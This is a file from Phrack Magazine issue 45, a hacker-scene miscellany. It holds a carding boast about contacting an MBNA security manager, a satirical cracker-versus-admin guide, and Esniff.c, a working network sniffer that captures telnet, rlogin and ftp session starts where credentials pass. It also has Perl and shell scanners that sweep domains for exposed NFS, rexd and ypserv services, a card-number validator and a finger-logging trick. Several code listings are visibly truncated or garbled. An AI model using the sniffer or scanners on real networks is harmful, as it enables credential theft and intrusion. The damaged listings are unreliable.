==Phrack Magazine== Volume Five, Issue Forty-Five, File 5 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ After a complete sellout at HoHo Con 1993 in Austin, TX this past December, the official Legion of Doom t-shirts are available once again. Join the net luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) "LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ My dealing with MBNA - VaxBuster March 8, 1994 ---------------------------------------------- A friend approached me on Unphamiliar Terrorities with a pretty funny message. It turns out that a high-up executive in MBNA sent mail to root at system with public temporary directories, where an issue of Phrack 44 was stored. My friend was monitoring root's mail, when he came across the following message. To: root@ Message-Id: <9401141340.aa09874@krusty.ee.udel.edu> Status: RO Hello, The reason I am sending this message to you is an article that seems to have been on your system . I am an Information Security Assurance manager at the largest issuer of Goldcard Mastercard and Visa's in the world "MBNA America". The article seems to be a copy or issue of "Phrack Magazine" written by "Vaxbuster". It describes in detail how one could defraud credit card companies. I have talked with the CERT People in CMU to see if I could get a contact at your UNIV. There may be an additional 21 or so of these articles that I would love to get ahold of to protect my company. Please, if you can, send me your phone number so I can talk with you in more detail. My phone number at MBNA in Delaware is . I can verify whatever information you may require over the phone or in writing. Thank you for your help. PS. We do not have a gateway or firewall to the Internet from here so the good People at UofDE allow me to have access from there systems. MBNA America Bank, NA. 400 Christiana Road Newark, DE 19713 Anyways, a couple people suggested that I call, and at first I thought that was a ridiculous idea, but I figured, what the hell, it may be funny. So NightStriker and I called him at his office one day in Mid-February. I was surprized he answered, and not a secretary, considering his position. I asked for him, and identified myself as VaxBuster. He shocked the hell out of me, because I really didn't expect him to immediately recognize my handle. He says, "Oh hey! how are you doing?" I told him I'd been monitoring mail, and came across his message. The main reason why I was calling was because he had mentioned he wanted 'more info' to protect his company. NTS and I were more than happy to answer any of his questions - but he said that he had obtained all of the issues. Although he said he had all of them, I highly doubt it, because he said he had like 20-some issues, and we told him there was 44. We chatted for about 15 more minutes, just about the reasons for publishing and not publishing such an article. He said "Some little kid is going to find this article and get his fingers burned" I could tell he was kind of pressured for time, so we kind of let it go at that, and he asked for our numbers to call us back. Oh, when I first called him, I didn't tell him I had a friend on the line, and he asked, "Is there an echo here?" hahahaha. Pretty funny. We told him NTS was there. So, when he asked for our numbers, we laughed out loud. I guess he doesn't really understand the secrecy we all so dearly cheerish. He said, "Well, I have caller id, so I have your numbers anyways" Bahahhahahaha. Yeah, right. We told him we were bouncing our call through a satellite in Japan. He thought we were joking. Guess he doesn't understand boxing huh? Maybe we should show him some of Tabas's files. heh. We told him we would call him back - which we haven't yet, but soon will. By the way, he complimented me on the quality of the article and how detailed it was. :) Incidentally, for those of you who've lived in a cave, this is all in reference to an article of mine published in Phrack 44 called 'Safe and Easy Carding.' And for all of you who didn't like my article - Fuck you. Greets out to all the eleets - Later. VaxBuster '94 ------------------------------------------------------------------------------ A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers. Author: Christopher Klaus Date: December 5th, 1993. Version: 1.1 This is a paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks. Here's the steps to becoming a uebercracker. Step 1. Relax and remain calm. Remember YOU are a Uebercracker. Step 2. If you know a little Unix, you are way ahead of the crowd and skip past step 3. Step 3. You may want to buy Unix manual or book to let you know what ls,cd,cat does. Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture. Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC. Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!) Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks questions like "Why cant I join #warez?" Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around your system for binary programs suid root (look in Unix manual from step 3 if confused). After finding a suid root binary, (ie. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts. Step 9. Make them send you some scripts before you send some garbage file (ie. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again. Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be obnoxious on #hack otherwise people will look down on you and not give you anything.) Step 11. Hopefully you will now have at least one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other user's mail, even rm log files and whatever temps you. (look in Unix manual from step 3 if confused). Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear coming from satan@evil.com. Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are a uebercracker.) Step 14. Wait a few months and have all your notes, etc ready in your room for when the FBI, Secret Service, and other law enforcement agencies confiscate your equipment. Call eff.org to complain how you were innocent and how you accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help, throw at them.) Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker. Now the next part of the paper is top secret. Please only pass to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.) This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop Uebercrackers. Step 1. Read Unix manual ( a good idea for admins ). Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts is among the favorites for getting root by uebercrackers. Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on Internet. Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.) Step 5. Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers. Step 6. Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration (ie. your NFS exports and anon FTP site.) Step 7. If you have done all of the following, you will have stopped 99% of all uebercrackers. Congrats! (Remember, You are the admin.) Step 8. Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is, like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.) Step 9. Here is the hard part is to try to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to Internet. They do not have to post it on Usenet, but share among many other trusted people and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches. Step 10. If you have gained the confidence of enough security experts, you will know be a looked up to as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile a IRC client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like - "That bug been known for years, there just isn't any patches for it yet. Here's my fix." and the other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big notch in my security circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that security hole, Flame him for discussing it since it could bring down Internet and all Uebercrackers will now have it and the million other reasons to keep everything secret about security. Well, this paper has shown the finer details of security on Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on Internet are as the following: 1. Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most uebercrackers would be stuck as new machines get added to Internet. (I believe Uebercracker is German for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that if you probably check the mail alias for "security@vendor.com", you will find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in manual if confused.) 2. Security experts giving up the attitude that they are above the normal Internet user and try to give out information that could lead to pressure by other admins to vendors to come out with fixes and patches. Most security experts probably don't realize how far their information has already spread. 3. And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker. Resources for Security: Many security advisories are available from anonymous ftp cert.org. Ask archie to find tcp_wrapper, security programs. For more information about ISS (Internet Security Scanner), email cklaus@shadow.net. Acknowledgments: Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott Miles, Scott Yelich, and Henri De Valois. Copyright: This paper is Copyright 1993, 1994. Please distribute to only trusted people. If you modify, alter, disassemble, reassemble, re-engineer or have any suggestions or comments, please send them to: cklaus@shadow.net ------------------------------------------------------------------------------ /* [JOIN THE POSSE!] */ /* Esniff.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIMENext; \ if(CLe->Time ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } ------------------------------------------------------------------------------ #! /bin/nawk -f # validcc.awk - validate credit card # { # validate CardNo number="" CardNo = $0 for (indig = 1; indig <= length(CardNo); indig++) { dig = substr(CardNo, indig, 1) if (dig ~ /^[0-9]$/) number = number dig else if (dig != " ") { print "bad character in CardNo" | "cat >&2" break } } digit1 = substr(number, 1, 1) cclen = length(number) if (digit1 == "3") { print "Sorry, we do not take American Express" | "cat >&2" # if (cclen != 15) # print "wrong length for CardNo" | "cat >&2" } else if (digit1 == "4") { # visa if (cclen != 13 && cclen != 16) print "wrong length for CardNo" | "cat >&2" } else if (digit1 == "5") { # master card if (cclen != 16) print "wrong length for CardNo" | "cat >&2" } else print "unknown credit card" | "cat >&2" if (cclen == 13) bias = 0 else bias = 1 for (llen = 1; llen <= cclen; llen++) { cdigit = digit = substr(number, llen, 1) if (((llen-1+bias)%2) == 1) # double every second digit cdigit *= 2 if (cdigit > 9) cdigit -= 9 # compensate ... csum += cdigit # ... add up all the digits } if ((csum%10) != 0) print "bad CardNo" | "cat >&2" } ------------------------------------------------------------------------------ /* File: bch2.c ====== Encoder/Decoder of binary primitive BCH codes ====== Robert Morelos-Zaragoza, University of Hawaii 5/19/92 This program computes the generator polynomial of the code by using cycle sets modulo n, n = 2^m - 1. (Part of this program is adapted from a Reed-Solomon encoder/decoder program, 'rs.c', for the binary case. rs.c was created by Simon Rockliff, University of Adelaide 21/9/89) Main variables: m = order of the field GF(2**m) n = 2**m - 1 = length t = error correcting capability d = 2*t + 1 = designed minimum distance k = n - deg(g(x)) = dimension p[] = primitive polynomial to generate GF(2**m) (read from least to most significant coefficient) g[] = generator polynomial alpha_to [] = log table in GF(2**m) index_of[] = antilog table in GF(2**m) data[] = data polynomial bb[] = redundancy polynomial = x**(n-k) data[] modulo g[] numerr = number of errors errpos[] = error positions recd[] = received polynomial decerror = number of decoding errors ( in MESSAGE positions) */ #include #include int m, n, k, t, d ; int p [20] ; /* irreducible polynomial */ int alpha_to [1024], index_of [1024], g [1024] ; int recd [1024], data [1024], bb [1024] ; int numerr, errpos [1024], decerror = 0 ; int seed; void read_p() /* Read primitive polynomial of degree m */ { register int i; printf("Enter m and primitive polynomial p(x): "); scanf("%d", &m); for (i=0; i<=m; i++) scanf("%d", &p[i]); printf("p(x) = "); for (i=0; i<=m; i++) printf("%1d", p[i]); printf("\n"); n = (int)(pow(2.0,(double) m)) - 1; } void generate_gf() /* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m] lookup tables: index->polynomial form alpha_to[] contains j=alpha**i; polynomial form -> index form index_of[j=alpha**i] = i alpha=2 is the primitive element of GF(2**m) */ { register int i, mask ; mask = 1 ; alpha_to[m] = 0 ; for (i=0; i>= 1 ; for (i=m+1; i= mask) alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ; else alpha_to[i] = alpha_to[i-1]<<1 ; index_of[alpha_to[i]] = i ; } index_of[0] = -1 ; } void gen_poly() /* Compute generator polynomial of BCH code of length n=2^m - 1 */ { register int ii, jj, ll, kaux; int test, aux, nocycles, root, noterms, rdncy; int cycle[256][11], size[256], min[128], zeros[256]; /* Generate cycle sets modulo n, n = 2^m - 1 */ cycle[0][0] = 0; size[0] = 1; cycle[1][0] = 1; size[1] = 1; jj = 1; /* cycle set index */ printf("Computing cycle sets modulo %d ...\n", n); do { /* Generate the jj-th cycle set */ ii = 0; do { ii++; cycle[jj][ii] = (cycle[jj][ii-1]*2) % n; size[jj]++; aux = (cycle[jj][ii]*2) % n; } while ( aux != cycle[jj][0] ); printf(" %d ", jj); if (jj && ( (jj % 10) == 0)) printf("\n"); /* Next cycle set representative */ ll = 0; do { ll++; test = 0; for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle sets */ for (kaux=0; ((kaux " if $verbose; &resolve("$root.$i"); } # # Do the work # sub resolve { local($name) = @_; # ip address if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { ($a,$b,$c,$d) = split(/\./, $name); @ip = ($a,$b,$c,$d); ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); } else { ($name, $aliases, $type, $len, @ip) = gethostbyname($name); ($a,$b,$c,$d) = unpack('C4',$ip[0]); } if ($name && @ip) { print "$a.$b.$c.$d\t$name\n"; system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R unning ypserv.\"\nfi\nfi"); } else { print "unable to resolve address\n" if $verbose; } } sub AF_INET {2;} ------------------------------------------------------------------------------ #!/bin/sh #rpc.chk 1.0 # # Make sure you have got a newer version of Bourne Shell (SVR2 or newer) # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS) # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to # change the magic number, indicating the type of executable Bourne Shell. # # The script obtains via nslookup utility a list of hostnames from a nameserver # and checks every entry of the list for active rexd procedures as well as # ypserver procedures. The output is a list of the sites that run those # daemons and are insecure. # -yo. domainname=$1 umask 022 PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH # # Function collects a list of sites # from a nameserver. Make sure you've got the nslookup utility. # get_list() { ( echo set type=ns echo $domainname ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null if [ ! -s .tmp$$ ]; then echo "No such domain" >&2 echo "Nothing to scan" >&2 exit 1 fi for serv in `cat .tmp$$`;do ( echo server $serv echo ls $domainname ) | nslookup > .file$$ 2>/dev/null lines=`cat .file$$ | wc -l` tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file sed -e "s/$/.$domainname/" .file.tmp > .hosts$$ rm -rf .file* .tmp$$ sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$ done tr 'A-Z' 'a-z' HOSTS.$domainname;rm -rf HOSTS$$ } # Function rpc_calls() { for entry in `cat HOSTS.$domainname`; do ( rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error! ) >> .log 2>/dev/null ( rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error ! ) >> .log 2>/dev/null done } # Main if [ "$domainname" = '' ]; then echo "Usage $0 domainname" >&2 exit 1 fi get_list echo "Checking $domainname domain" > .log echo "*****************************" >> .log echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log echo "******************************" >> .log echo "started at `date`" >> .log echo "******************************" >> .log rpc_calls echo "******************************" >> .log echo "finished at `date`" >> .log ------------------------------------------------------------------------------ The Ultimate Finger/Mail Hack by Emanon (a.k.a. WinterHawk) This program will keep a log of who fingers you on your local host and tell you when the finger was performed. As an added tease, it will send email to the person doing the fingering telling them that you know who they are and you know when they fingered you, even when you are not logged on. Easy to follow steps: [This is a comment] [ALL OF THE FOLLOWING FILES ARE TO GO IN YOUR HOME DIRECTORY!!!] [Get to your home directory] % cd [Make a file called .mailscript and include the following source code] [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!] % cat .mailscript #!bin/sh MYNAME=your_account_name # JUST YOUR LOCAL ACCOUNT NAME, NOT THE FULL ADDRESS!!! HOME=/your/full/home/path/goes/here SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'` echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER [On some systems, the `u' flag is not necessary for the `ps' command] [On most systems, you will not have to (re)declare the $HOME variable] [If you do not want the fingerer to receive email, remove the last line] [You may wish to hard code your account name, rather than using the variable] [Make a file called fingerLog.c and include the following source code] [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!] % cat fingerLog.c #include #include main() { int x, pipeHandle, planHandle; char * pipeFile = "/your/full/home/path/goes/here/.plan"; char * planFile = "/your/full/home/path/goes/here/.realplan"; char buf[1024]; for(;;){ pipeHandle=open(pipeFile,O_WRONLY); planHandle=open(planFile,O_RDONLY); while((x=read(planHandle,buf,sizeof(buf)))>0) write(pipeHandle,buf,x); system("sh /your/full/home/path/goes/here/.mailscript"); close(pipeHandle); close(planHandle); sleep(3);} } [Compile the fingerLog.c program] % cc fingerLog.c -o fingerLog [You may want to use a more inconspicuous name for the executable file] [Move you .plan file to .realplan] % mv .plan .realplan [Make a piped FIFO .plan file] % mknod .plan p [Allow people to view your bogus .plan file] % chmod 755 .plan [Run fingerLog in the background] % nohup fingerLog > /dev/null & [Optional clean up] % rm fingerLog.c PROBLEMS: On some machines, the [ps -fau] option will not reveal what account a person is actually fingering. In this case, you can remove all instances of the $MYNAME variable from the [.mailscript] file. However, it is entirely possible that two people may be performing a finger at the same time and the script may log the wrong one. If you do have to omit the $MYNAME variable, I strongly suggest that you also remove the email option. And, you might as well change the [ps] command to a simple [w], like so: SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'` Also, if the system you are on is bogged down with a lot of processes, the script may not find the fingerer before the process is 